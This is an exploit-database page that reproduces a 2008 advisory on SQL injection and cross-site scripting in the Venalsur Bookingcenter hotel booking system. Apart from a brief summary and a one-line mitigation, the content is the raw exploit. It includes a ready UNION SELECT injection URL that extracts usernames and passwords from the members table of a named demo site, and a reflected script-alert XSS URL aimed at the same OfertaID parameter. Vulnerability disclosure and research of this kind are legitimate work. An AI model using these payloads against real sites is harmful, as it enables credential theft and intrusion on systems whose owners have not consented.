header-logo
Suggest Exploit
vendor:
Booking System for Hotels Group
by:
d3b4g
7.5
CVSS
HIGH
XSS/SQL Injection
89
CWE
Product Name: Booking System for Hotels Group
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injetion vulnerability!

A vulnerability exists in Booking System for Hotels Group powered by Venalsur Bookingcenter which allows an attacker to inject malicious SQL queries and XSS payloads. An attacker can exploit this vulnerability by sending a malicious SQL query or XSS payload to the vulnerable parameter OfertaID in the URL http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql] or http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</script>

Mitigation:

Input validation should be used to prevent malicious SQL queries and XSS payloads from being injected into the vulnerable parameter OfertaID.
Source

Exploit-DB raw data:

Booking System for Hotels Group  powered by Venalsur Bookingcenter  XSS/SQL injetion vulnerability!
------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
Author:   d3b4g

Greetz:   str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends
Site   :  www.bl4ck3nd.info
Contact:  bl4ckend[at]gmail[dot]com
-------------------------------------------------------------------


-------------------------------------------------------------------
Dork:         N/A
-------------------------------------------------------------------
Affected software:

-----------------
Application : Booking System for Hotels Group powered by Venalsur Bookingcenter
URL :  http://www.bookingcentre.eu
===================================================================

Sql injection
=============


Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql]

Demo   : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*

------------------------------------------------------------------------

Xss
===

Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</script>

=========================================================================

Proud to be a maldivian :):) Happy new maldives [29.10.2008]

# milw0rm.com [2008-10-29]

Navigation

Suggest Exploit

Services By CQR